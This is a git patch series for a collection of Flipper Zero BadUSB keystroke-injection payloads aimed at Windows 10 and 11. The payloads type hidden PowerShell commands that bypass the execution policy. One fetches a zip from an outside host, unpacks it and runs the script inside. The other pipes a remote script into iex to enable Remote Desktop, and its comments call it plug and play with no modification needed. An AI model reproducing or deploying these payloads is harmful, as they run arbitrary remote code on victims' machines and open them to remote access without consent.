From d013c61eaa4183d93e2d725f25ac74b832b3b31c Mon Sep 17 00:00:00 2001 From: Jonas <115997296+UNC0V3R3D@users.noreply.github.com> Date: Tue, 27 Dec 2022 23:39:22 +0100 Subject: [PATCH 1/4] Update JumpScare2.0.txt --- Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt b/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt index ce68e5d..ab3b7c7 100644 --- a/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt +++ b/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt @@ -10,5 +10,5 @@ REM ------------------------------------------------------------------------- DELAY 2000 GUI r DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" +STRING powershell -w h -NoP -NonI -Ep Bypass $downloadDirectory = "$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -OutFile "$downloadDirectory\js.zip";Expand-Archive "$downloadDirectory\js.zip" -DestinationPath $downloadDirectory -Force;. "$downloadDirectory\js\js.ps1" ENTER From 78ed7417317ee3a1af98c2a6a321cd6a9991f3ef Mon Sep 17 00:00:00 2001 From: Jonas <115997296+UNC0V3R3D@users.noreply.github.com> Date: Tue, 27 Dec 2022 23:48:08 +0100 Subject: [PATCH 2/4] Add Flip-RDP --- Payloads/Flip-RDP/activateRDP.txt | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 Payloads/Flip-RDP/activateRDP.txt diff --git a/Payloads/Flip-RDP/activateRDP.txt b/Payloads/Flip-RDP/activateRDP.txt new file mode 100644 index 0000000..41d43e6 --- /dev/null +++ b/Payloads/Flip-RDP/activateRDP.txt @@ -0,0 +1,16 @@ +REM Title: AcidBurn + +REM Author: UNC0V3R3D + +REM Description: This payload is going to activate remote desktop. + +REM Target: Windows 10, 11 + +REM -------------------------------------------------------------------------------------- +REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +REM -------------------------------------------------------------------------------------- + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex +ENTER \ No newline at end of file From 78516fd82053dd3f4c1b40ed28bb0c8fd5865e2d Mon Sep 17 00:00:00 2001 From: Jonas <115997296+UNC0V3R3D@users.noreply.github.com> Date: Tue, 27 Dec 2022 23:48:56 +0100 Subject: [PATCH 3/4] Update JumpScare2.0.txt --- Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt b/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt index ab3b7c7..ce68e5d 100644 --- a/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt +++ b/Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt @@ -10,5 +10,5 @@ REM ------------------------------------------------------------------------- DELAY 2000 GUI r DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass $downloadDirectory = "$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -OutFile "$downloadDirectory\js.zip";Expand-Archive "$downloadDirectory\js.zip" -DestinationPath $downloadDirectory -Force;. "$downloadDirectory\js\js.ps1" +STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" ENTER From 09214e938267daf535c22a93afa239bb68658608 Mon Sep 17 00:00:00 2001 From: Jonas <115997296+UNC0V3R3D@users.noreply.github.com> Date: Tue, 27 Dec 2022 23:54:25 +0100 Subject: [PATCH 4/4] Update activateRDP.txt --- Payloads/Flip-RDP/activateRDP.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Payloads/Flip-RDP/activateRDP.txt b/Payloads/Flip-RDP/activateRDP.txt index 41d43e6..8a710e8 100644 --- a/Payloads/Flip-RDP/activateRDP.txt +++ b/Payloads/Flip-RDP/activateRDP.txt @@ -1,4 +1,4 @@ -REM Title: AcidBurn +REM Title: RDP REM Author: UNC0V3R3D @@ -13,4 +13,4 @@ REM ------------------------------------------------------------------------ GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex -ENTER \ No newline at end of file +ENTER